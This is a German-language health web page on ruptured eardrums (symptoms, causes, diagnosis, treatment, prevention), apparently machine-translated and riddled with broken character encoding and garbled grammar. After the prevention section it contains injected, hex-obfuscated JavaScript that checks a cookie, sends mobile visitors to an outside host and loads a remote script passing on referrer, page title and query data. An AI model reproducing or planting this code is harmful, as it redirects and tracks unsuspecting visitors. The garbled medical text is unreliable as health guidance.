Krankheit

Gebrochene Trommelfell (Trommelfell perforiert)

Gebrochene Trommelfell (Trommelfell perforiert)Eine Ruptur des Trommelfells – oder perforiertem Trommelfell, wie es medizinisch bekannt – ist ein Loch oder Riss im Trommelfell, das dA?nne Gewebe, das den GehAi??rgang vom Mittelohr trennt.

Eine Ruptur des Trommelfells kann zu HAi??rverlust fA?hren.Ai??Eine Ruptur des Trommelfells kAi??nnen auch Ihre Mittelohr anfAi??llig fA?r Infektionen oder Verletzungen.

Eine Ruptur des Trommelfells heilt normalerweise innerhalb von ein paar Wochen ohne Behandlung.Ai??Manchmal wird jedoch eine Ruptur des Trommelfells erfordert eine Prozedur oder chirurgische Reparatur zu heilen.

Symptome

Anzeichen und Symptome von einem geplatzten Trommelfell kAi??nnen gehAi??ren:

  • Ohrenschmerzen, die schnell abklingen kann
  • Klar, mit Eiter gefA?llte oder blutiger Drainage aus dem Ohr
  • HAi??rverlust
  • Klingeln im Ohr (Tinnitus)
  • Drehschwindel (Vertigo)
  • A?belkeit oder Erbrechen, die von Schwindel fA?hren kann

Wenn zum Arzt

Rufen Sie Ihren Arzt, wenn Sie eines der Anzeichen oder Symptome einer Ruptur oder perforiertes Trommelfell oder Schmerzen oder Beschwerden in den Ohren zu erleben.Ai??Ihre Mittel-und Innenohren sind aus zartem Mechanismen, die empfindlich auf Verletzungen oder Erkrankungen sind zusammen.Ai??Prompt und angemessene Behandlung ist wichtig, um Ihr GehAi??r zu bewahren.

Ursachen

Ursachen von einem geplatzten oder perforiert, Trommelfell kAi??nnen gehAi??ren:

  • MittelohrentzA?ndung (Otitis media).Ai??Ai??Eine MittelohrentzA?ndung fA?hrt hAi??ufig zu der Ansammlung von FlA?ssigkeiten in Ihrem Mittelohr.Ai??Druck dieser FlA?ssigkeiten kAi??nnen zum Trommelfell zum Platzen.
  • Barotrauma.Ai??Ai??Barotrauma ist Stress auf das Trommelfell ausgeA?bt wird, wenn der Luftdruck im Mittelohr und der Luftdruck in der Umwelt aus dem Gleichgewicht.Ai??Wenn der Druck stark ist, kann das Trommelfell reiAYen.Ai??Barotrauma wird auch als Flug Ohr, weil es meist durch LuftdruckAi??nderungen mit Flugreisen verursacht werden.Andere Ereignisse, die plAi??tzliche DruckAi??nderungen verursachen kAi??nnen – und mAi??glicherweise einen geplatzten Trommelfell – sind Tauchen und einen direkten Schlag auf das Ohr, wie die Auswirkungen eines Automobils Airbags.
  • Laute TAi??ne oder Blasten (akustisches Trauma).Ai??Ai??Ein lauter Ton oder Explosion, wie von einer Explosion oder Gewehrschuss – im Wesentlichen eine A?berwAi??ltigende Klangwelle – eine TrAi??ne im Trommelfell verursachen.
  • FremdkAi??rper im Ohr.Ai??Ai??Kleine Objekte, wie zB einem WattestAi??bchen oder Haarnadel, kann bohren oder das Trommelfell reiAYen.
  • Schwere Kopfverletzungen.Ai??Ai??schweren Verletzungen, wie SchAi??delbruch kann die Versetzungs oder SchAi??den an Mittel-und Innenohrstrukturen, einschlieAYlich Trommelfell verursachen.

Komplikationen

Ihr Trommelfell (Trommelfell) hat zwei Hauptaufgaben:

  • . GehAi??rAi??Ai??Wenn Schallwellen auf sie, vibriert das Trommelfell – der erste Schritt, mit dem Strukturen Ihres mittleren und inneren Ohren A?bersetzen Schallwellen in Nervenimpulse.
  • Schutz.Ai??Ai??Ihre Trommelfell fungiert auch als Barriere und schA?tzt Ihre Mittelohr aus dem Wasser, Bakterien und andere Fremdstoffe.

Wenn das Trommelfell platzt, Komplikationen kAi??nnen auftreten, wAi??hrend das Trommelfell heilt oder wenn es nicht zu heilen.Ai??MAi??gliche Komplikationen sind:

  • HAi??rverlust.Ai??Ai??Normalerweise HAi??rverlust ist vorA?bergehend, dauerhaft nur, bis der Riss oder ein Loch im Trommelfell verheilt.Ai??Die GrAi??AYe und Lage des Risses kAi??nnen den Grad der SchwerhAi??rigkeit beeinflussen.
  • MittelohrentzA?ndung (Otitis media).Ai??Ai??Ein perforiertes Trommelfell kann, dass Bakterien an das Ohr gelangen.Ai??Wenn ein perforiertes Trommelfell heilt nicht oder nicht repariert wird, kann es anfAi??llig fA?r anhaltenden (chronischen) Infektionen, die zu GehAi??rschAi??den fA?hren kann.
  • Mittelohrzyste (Cholesteatom).Ai??Ai??Ein Cholesteatom ist eine Zyste im Mittelohr der Hautzellen und andere Verunreinigungen besteht.GehAi??rgang Schutt reist normalerweise zu Ihrer AuAYenohr mit Hilfe von Ohr-Schutz Ohrenschmalz.Ai??Wenn Ihr Trommelfell gerissen ist, kann die Haut TrA?mmer in Mittelohr weitergeben und bilden eine Zyste.

    Ein Cholesteatom bietet eine freundliche Umgebung fA?r Bakterien und enthAi??lt Proteine, die Knochen des Mittelohr schAi??digen kAi??nnen.

Vorbereitung fA?r den Termin

Wenn Sie Anzeichen oder Symptome einer perforierten Trommelfell haben, sind Sie wahrscheinlich durch Sehen Ihrem Hausarzt oder Allgemeinarzt zu starten.Ai??Jedoch kann Ihr Arzt Sie an einen Spezialisten fA?r Hals-, Nasen-und Ohrenkrankheiten (HNO-Arzt oder HNO-Arzt) zu entnehmen.

Hier einige Informationen, um Ihnen fA?r Ihren Termin vorbereiten.

Was Sie tun kAi??nnen

Machen Sie eine Liste vor der Zeit, die Sie mit Ihrem Arzt teilen kAi??nnen.Ai??Ihre Liste sollte enthalten:

  • SymptomeAi??Ai??bei Ihnen auftreten, auch alle, die in keinem Zusammenhang mit HAi??rverlust, FlA?ssigkeit Entladung oder andere Ohr-Symptome scheinen mag
  • Relevante EreignisseAi??Ai??, die zu Ihrem Ohr Probleme verwandt sind, wie eine Geschichte von Ohr-Infektionen, die jA?ngsten Verletzungen oder aktuelle Flugreisen
  • Medikamente,Ai??Ai??einschlieAYlich Vitamine oder NahrungsergAi??nzungs du nimmst
  • FragenAi??Ai??fA?r Ihren Arzt

Wenn Sie denken, Sie Anzeichen oder Symptome von einem geplatzten Trommelfell haben, kAi??nnen Sie Ihren Arzt fragen einige der folgenden Fragen.

  • Habe ich einen geplatzten Trommelfell?
  • Was kAi??nnte die Ursache meiner SchwerhAi??rigkeit und andere Symptome?
  • Wenn ich einen geplatzten Trommelfell, was muss ich tun, um mein Ohr wAi??hrend des Heilungsprozesses zu schA?tzen?
  • Welche Art von Follow-up-Termine benAi??tige ich?
  • An welchem ai??i??ai??i??Punkt mA?ssen wir auf andere Behandlungen zu beachten?

ZAi??gern Sie nicht, andere Fragen zu stellen.

Was Sie von Ihrem Arzt erwarten

Ihr Arzt wird Ihnen wahrscheinlich eine Reihe von Fragen, einschlieAYlich Fragen:

  • Wann haben Sie das erste Erfahrung Symptome?
  • Haben Sie Symptome wie Schmerzen oder Schwindel, die geklAi??rt?
  • Hatten Sie Ohr-Infektionen?
  • Haben Sie auf laute GerAi??usche ausgesetzt worden?
  • Haben Sie Schwimmen oder Tauchen vor kurzem?
  • Haben Sie vor kurzem geflogen?
  • Haben Sie hatte Kopfverletzungen?
  • Wissen Sie etwas in Ihrem Ohr setzen, um es zu reinigen?

Was Sie in der Zwischenzeit tun kAi??nnen

Wenn Sie denken, dass Sie einen geplatzten Trommelfell haben, achten Sie darauf, um Ihre Ohren trocken zu halten, um eine Infektion zu verhindern.Ai??Schwimmen Sie nicht.Ai??Um Wasser aus dem Ohr zu halten, wenn Duschen oder Baden, verwenden Sie eine formbare, wasserdichte SilikonohrstAi??psel oder setzen Sie einen Wattebausch mit Vaseline in Ihrem Ai??uAYeren Ohr.

Stellen Sie keine Medikamente Tropfen in das Ohr, wenn Ihr Arzt verschreibt sie speziell fA?r die Infektion zu Ihrer perforiertes Trommelfell zusammen.

Untersuchungen und Diagnostik

Ihr Hausarzt oder HNO-Arzt kann oft festzustellen, ob Sie ein perforiertes Trommelfell mit einer visuellen Inspektion mit einer brennInstrument (Otoskop) haben.

Er oder sie kann durchfA?hren oder bestellen Sie zusAi??tzliche Tests, um die Ursache des Bruchs oder der Grad der SchAi??den zu bestimmen.Ai??Diese Tests umfassen:

  • Labortests.Ai??Ai??Wenn es Ausfluss aus dem Ohr, kann Ihr Arzt einen Labortest oder Kultur, um eine bakterielle Infektion des Mittelohrs zu erkennen.
  • Stimmgabel Auswertung.Ai??Ai??Stimmgabeln sind zwei-SAi??ulen-, Metall-Instrumente, KlAi??nge zu erzeugen, wenn geschlagen.Ai??Einfache Tests mit Stimmgabeln kann Ihr Arzt erkennen HAi??rverlust.Ai??Stimmgabel Auswertung kann auch zeigen, ob HAi??rverlust wird durch SchAi??den an der schwingenden Teile des Mittelohrs (einschlieAYlich Ihrer Trommelfell), SchAi??den an Sensoren oder Nerven Ihrer Innenohr oder SchAi??den an beiden verursacht.
  • Tympanometrie.Ai??Ai??A Tympanometer verwendet ein GerAi??t in den GehAi??rgang, die die Reaktion von Trommelfell zu leichten Ai??nderungen im Luftdruck misst, eingesetzt.Bestimmte Muster der Antwort kann zeigen ein perforiertes Trommelfell.
  • Audiologie-PrA?fung.Ai??Ai??Wenn andere HAi??rtests sind nicht schlA?ssig, kann Ihr Arzt eine audiologische Untersuchung, eine Reihe von genau kalibrierten Tests in einer schalldichten Kabine durchgefA?hrt, die, wie gut Sie bei unterschiedlichen Volumen und TonhAi??hen hAi??ren GerAi??usche messen bestellen.

Behandlungen und Medikamente

Die meisten perforiertem Trommelfell heilen ohne Behandlung innerhalb weniger Wochen.Ai??Ihr Arzt kann Antibiotika verschreiben, Tropfen, wenn es Anzeichen einer Infektion.Ai??Wenn der Riss oder ein Loch im Trommelfell nicht von selbst heilen, wird die Behandlung Verfahren beinhalten, um die Perforation zu schlieAYen.Ai??Diese kAi??nnen sein:

  • Trommelfell-Patch.Ai??Ai??Wenn der Riss oder ein Loch im Trommelfell nicht auf seine eigene zu schlieAYen, kann ein HNO-Arzt mit einem Patch zu versiegeln.Ai??Mit diesem Office-Verfahren, kann Ihr HNO eine Chemikalie, die RAi??nder des Risses um Wachstum zu stimulieren anwenden und dann einen Patch A?ber das Loch.Ai??Das Verfahren mA?ssen mAi??glicherweise mehr als einmal vor den Loch schlieAYt wiederholt werden.
  • Chirurgie.Ai??Ai??Wenn ein Patch nicht in die richtige Heilung fA?hren oder Ihren HNO bestimmt, dass der Riss ist nicht wahrscheinlich, mit einem Patch zu heilen, kann er oder sie empfehlen Chirurgie.Ai??Die hAi??ufigste chirurgische Prozedur aufgerufen Tympanoplastik.Ihr Chirurg Transplantate einen winzigen Fleck Ihr eigenes Gewebe, um das Loch im Trommelfell zu schlieAYen.Ai??Diese Prozedur wird ambulant durchgefA?hrt, das heiAYt, Sie kAi??nnen in der Regel nach Hause gehen am gleichen Tag, es sei denn medizinische AnAi??sthesie Bedingungen eine lAi??ngere Krankenhausaufenthalt erfordern.

Lifestyle und Hausmittel

Eine Ruptur des Trommelfells heilt in der Regel auf eigene innerhalb weniger Wochen.Ai??In einigen FAi??llen, Heilung dauert Monate.Ai??Bis Ihr Arzt sagt Ihnen, dass Ihr Ohr geheilt ist, zu schA?tzen, indem Sie die folgenden Schritte aus:

  • Halten Sie Ihr Ohr trocken.Ai??Ai??Legen Sie einen wasserdichten Silikon-OhrstAi??psel oder Watte mit Vaseline in Ihr Ohr, wenn Duschen oder Baden beschichtet.
  • Verzichten Reinigung Ihrer Ohren.Ai??Ai??Geben Sie Ihrem Trommelfell Zeit, um vollstAi??ndig zu heilen.
  • Vermeiden Sie die Nase zu putzen.Ai??Ai??Der Druck entsteht, wenn die Nase zu putzen kann den Heil Trommelfell beschAi??digen.

Vorbeugung

Befolgen Sie diese Tipps, um eine Ruptur oder perforiertes Trommelfell zu vermeiden:

  • Lass Behandlung fA?r MittelohrentzA?ndungen.Ai??Ai??Beachten Sie die Anzeichen und Symptome der MittelohrentzA?ndung, einschlieAYlich Ohrenschmerzen, Fieber, verstopfte Nase und reduziert GehAi??r.Ai??Kinder mit einer MittelohrentzA?ndung oft reiben oder ziehen an den Ohren.Ai??Ziehen Sie sofort Auswertung von Ihrem Hausarzt, um mAi??gliche SchAi??den am Trommelfell zu verhindern.
  • SchA?tzen Sie Ihre Ohren wAi??hrend des Fluges.Ai??Ai??Wenn mAi??glich, fliegen Sie nicht, wenn Sie eine ErkAi??ltung oder Allergie, die eine aktive Nasen-oder Ohr Staus verursacht haben.Bei Starts und Landungen, halten Sie Ihre Ohren klar mit DruckausgleichsstAi??psel, GAi??hnen oder Kaugummi.Ai??Oder nutzen Sie das Valsalva-ManAi??ver – sanft weht, als ob die Nase zu putzen, wAi??hrend die Nase kneifen und halten Sie den Mund geschlossen.Ai??WAi??hrend der Auf-und Abstiege nicht schlafen.
  • Halten Sie Ihre Ohren frei von FremdkAi??rpern.Ai??Ai??Versuchen Sie niemals, mit GegenstAi??nden wie einem WattestAi??bchen, BA?roklammer oder Haarnadel graben A?berschA?ssige oder gehAi??rteten Ohrenschmalz.Ai??Diese GegenstAi??nde kAi??nnen leicht reiAYen oder das Trommelfell durchstoAYen.Ai??Bringen Sie Ihren Kindern A?ber die SchAi??den, indem sie FremdkAi??rper in die Ohren getan werden kann.
  • SchA?tzen Sie sich vor A?bermAi??AYigem LAi??rm.Ai??Ai??SchA?tzen Sie Ihre Ohren vor unnAi??tigen SchAi??den, die durch das Tragen von SchutzstAi??psel oder OhrenschA?tzer an Ihrem Arbeitsplatz oder bei FreizeitaktivitAi??ten, wenn lautes GerAi??usch vorhanden ist.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Powered by: Wordpress